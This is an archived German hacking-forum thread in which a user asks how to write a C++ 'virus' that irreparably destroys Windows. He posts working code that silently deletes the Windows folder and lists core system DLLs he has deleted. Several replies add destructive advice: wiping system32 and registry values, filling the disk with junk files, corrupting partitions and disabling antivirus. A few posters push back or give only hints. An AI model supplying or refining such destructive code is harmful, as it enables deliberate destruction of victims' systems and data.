PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : C++ Virus



>[FaaX]<
22.09.2008, 17:47
Hey Leute jetzt brauch ich mal eure Hilfe !
Also ich bin dabei einen "Virus" unter C++ zu programmieren natürlich nur aus Programmierinteresse. ^^
Ich weiss aber nicht wie ich das anstellen soll mit dem Windows also ich möchte es löschen,zerstören oder irgendetwas in der Art xD.
Es sollte am besten ganz gelöscht werden so das man es nichtmehr reparieren kann.
Ich hab bis jetzt eine unschöne Art benutzt und zwar hab ich 3 .dll files gelöscht die das Windows XP nicht mehr booten lassen.
Aber die könnte man ja wenn man Ahnung hat wiederherstellen.

Hat jemand eine Idee ?

by >[FaaX]< :twisted:

mo0wm
22.09.2008, 17:53
Das ist kein Virus sondern ein Systemfucker.
Lösch einfach das Windowsverzeichniss oder verändere die Dateien

&gt;[FaaX]&lt;
22.09.2008, 17:56
LoL dann halt Systemfucker sry bin net so ein krasses 1337 h4xxor.
Geht das wenn das System gerade am laufen ist ?

damn developer
22.09.2008, 18:45
Wenn du es wirklich nur aus Programmierinteresse machen würdest, würdest du es selber ausprobieren.
Man muss kein krasser 1337 haxxor sein um soetwas zu programmieren, aber man sollte wenigstens die Sprache C++ können und gewisse PC Grundkentnisse haben, dann kannst du dir solche Fragen nämlich sparen.
Ich gehe davon aus das du nichtmal programmieren kannst :E .

Gruß
damn developer

&gt;[FaaX]&lt;
22.09.2008, 18:54
Ich meinte wegen dem Wort und das war Ironisch du Genie !
Ich kann C++ danke.
Ich hab auch schon was ausprobiert und nicht nur 1 Möglichkeit viele !!!
Nur es funktioniert nicht deswegen frage ich so genau.

void killSystem()
{
SHFILEOPSTRUCT myFileOp;
ZeroMemory(&myFileOp, sizeof(myFileOp));
myFileOp.hwnd = 0;
myFileOp.wFunc = FO_DELETE;
// Hier der Ordner
myFileOp.pFrom = "C:\\WINDOWS";
// Hier kommt ob oder wie ein Dialog angezeigt wird.
myFileOp.fFlags = FOF_NOCONFIRMATION;
myFileOp.lpszProgressTitle = "Delete Ordner";
SHFileOperation(&myFileOp);
}

Fehlermeldung: Datei kann nicht gelöscht werden: Die Quelldatei oder vom Quelldatenträger kann nicht gelesen werden.

helloworld123
22.09.2008, 19:01
C:\\WINDOWS ?????

C:\WINDOWS !!!!!!!

Steav
22.09.2008, 19:43
C:\\WINDOWS ?????

C:\WINDOWS !!!!!!!


C:\\WINDOWS ist schon richtig... In C-Sprachen werden \ als Escapesequenzen innerhalb von Strings verwendet.

&gt;[FaaX]&lt;
22.09.2008, 19:55
Genau =) es sollte doch alles richtig sein oder ?
Ich finde den Fehler einfach nicht.

]=-antr4xx-=[
22.09.2008, 20:07
Schau dir mal "SHFILEOPSTRUCT" an, vielleicht fehlt ja da ein beötigter Member, den du nicht ausgefüllt hast.

zao
22.09.2008, 20:43
mach mal es av aus

&gt;[FaaX]&lt;
25.09.2008, 13:24
Liegt nicht an AV... ich kommt nicht weiter weiss niemand was anderes ?

l0dsb
25.09.2008, 15:23
Du kannst keine im laufenden Betrieb verwendeten Systemdateien löschen. - Zum Thema Viren schreiben: Sie wurden vor allem aus reinem Interesse und mit viel Kreativität geschrieben (Poly- und Metaengines, neue Ansätze, PenTesting des OS, ...), ein DeleteFileA-Snippet ist kein Virus im eigentlichen Sinne, das ist keine Kreativität, das ist Kiddystuff.

&gt;[FaaX]&lt;
25.09.2008, 15:38
Ach ja tolles board hier. Man redet nur immer um das Thema herum weil keiner eig. eine Ahnung davon hat.
Und wie löscht oder zerstört man dann ein Betriebssystem ?
Weil bei anderen Systemfucker funktioniert das ja auch.

l0dsb
25.09.2008, 15:49
Ach ja tolles board hier. Man redet nur immer um das Thema herum weil keiner eig. eine Ahnung davon hat.
Mit der Einstellung kannst du auch keine Hilfe erwarten. zao's Einwurf hast du beachtet, jedoch antr4xx' und meinen wohl ignoriert... wir werden dir keine fertige Lösung posten (was jedoch nicht persönlich an dir liegt, nicht falsch verstehen).

Welche Gedanken hast du dir diesbezüglich schon gemacht? Windows-Ordner löschen hat nicht geklappt, den Grund habe ich dir angegeben. Welche Dateien braucht so ein Betriebssystem denn noch? Oder ein anderer Ansatz - wie findet das BIOS das System auf der Platte? Ich werfe auch mal das Stichwort WFP in den Raum (das wirst du im Laufe deiner Entdeckungstour noch brauchen), was das ist, erklärt die Google beim richtigen Suchbegriff.

Andere Benutzer werden sich für ihre Antworten nur so viel Zeit nehmen, wie du es für die ganze Sache bisher getan hast, also halte uns doch bitte auf dem aktuellen Stand: Was hast du bisher versucht, welchen Ansatz möchtest du verfolgen?

&gt;[FaaX]&lt;
25.09.2008, 16:01
Ok.

Also um ein Betriebssystem zu starten braucht man den Bootmanager aber ich weiss nicht wo der liegt.
Windows legt extra eine eigene Partition denke ich mal an.
In der Registry hab ich auch schon gesucht und versucht wichtige Einträge zu löschen bringt aber nichts.
Ich hab mal die Datei hal.dll gelöscht hat auch funktioniert aber die könnte man zu leicht wiederherstellen.
Ich möchte kein Virus verschicken der einfach wild PC's zerstört sondern nur aus Interesse einen zu programmieren da ich mich ein bisschen in die winapi einarbeite.
Er kopiert sich bis jetzt in die Registry 2 mal, sperrt den Taskmanager (nicht über die Registry), zieht die Maus immer an eine Position, blendet die untere Taskleiste aus und lässt den PC-Lautpsprecher nervend beepen. (Bin dabei ein kleines Lied selber zu "komponieren" xD das dann beim ausführen erscheint.)

EDIT: Also anscheinden muss man das System so zerstören in dem man wichtige Systemdateien löscht oder bootdateien.
Ich hab bis jetzt:

kernel32.dll
hal.dll
user32.dll
gdi32.dll

blackberry
25.09.2008, 21:20
<]Windows legt extra eine eigene Partition denke ich mal an.

Ja, das stimmt:
http://img3.imagebanana.com/img/3ma2h7oe/Screenshot.png

Die Partition stammt von Windows Vista Home Premium...

zao
25.09.2008, 23:53
f0Gx hat alles gesagt...

aber ich hab noch was für dich :D


Beep(262, 500);
Beep(294, 500);
Beep(330, 500);
Beep(349, 500);
Beep(392, 1000);
Beep(392, 1000);
Beep(440, 500);
Beep(440, 500);
Beep(440, 500);
Beep(440, 500);
Beep(392, 1500);
Beep(440, 500);
Beep(440, 500);
Beep(440, 500);
Beep(440, 500);
Beep(392, 1500);
Beep(349, 500);
Beep(349, 500);
Beep(349, 500);
Beep(349, 500);
Beep(330, 1000);
Beep(330, 1000);
Beep(294, 500);
Beep(294, 500);
Beep(294, 500);
Beep(294, 500);
Beep(262, 1500);

&gt;[FaaX]&lt;
26.09.2008, 16:36
THX erstmal ;) werde drann bleiben.

Breeze
26.09.2008, 16:45
ab besten löschst du alle wichtigen registry-werte und den system32 ordner
damit hast du eig alles zerschossen^^

-[RiDER]-
26.09.2008, 16:54
Hi :D

<]Also um ein Betriebssystem zu starten braucht man den Bootmanager aber ich weiss nicht wo der liegt.
Ich dachte immer, der läge im MBR oder im ersten Cluster der gemasterten Festplatte.
Aber Windows erfindet sicher sowas wie extra Partitionen, LOL...

Wenn der Bootmanager lahm liegt, ist das System allerdings noch voll funktionsfähig!
Ein simples FIXMBR in diesem tollen Windows-CD-einlegen-und-an-der-richtigen-Stelle-R-drück-Konsole (Reperatur-Weißdergeierwas) sollte reichen, um das System zu "unfucken".

GreetZ RiDER :D :D :D

&gt;[FaaX]&lt;
27.09.2008, 22:20
Hmm ja ich weiss aber ich beschädige mehrere Boot-Dateien da sollte das schon länger dauern.
Wie könnt ich das System aber noch beschädigen ?
Bei den meisten Systemfuckern kommt dann nach dem löschen oder beschädigen: "Wichtige Dateien fehlen legen Sie die Windows cd ein..."
Oder so ähnlich weiss jemand was da gelöscht bzw. beschädigt wird ?

Deshoax
02.10.2008, 20:29
was du noch machen könntest ist, einen mini flooder einzubauen.
wenn du die hauptdll´s löschst und dann den GESAMMTEN speicherplatz mit sinlosen dateien zumüllst, kann die windows reparatur eig nix mehr machen.
was natürlich noch schöner wäre wenn du villt ein bisschen mit.... ach wie heißt das nochens.....ah ja! genau! probier ma ein bisschen mit testdisk die partition dermaßen zu verunstalten das es einfach nicht mehr lebt :twisted:

PS: Ja das hab ich schon 2 mal geschafft, unbeabsichtigt... -.-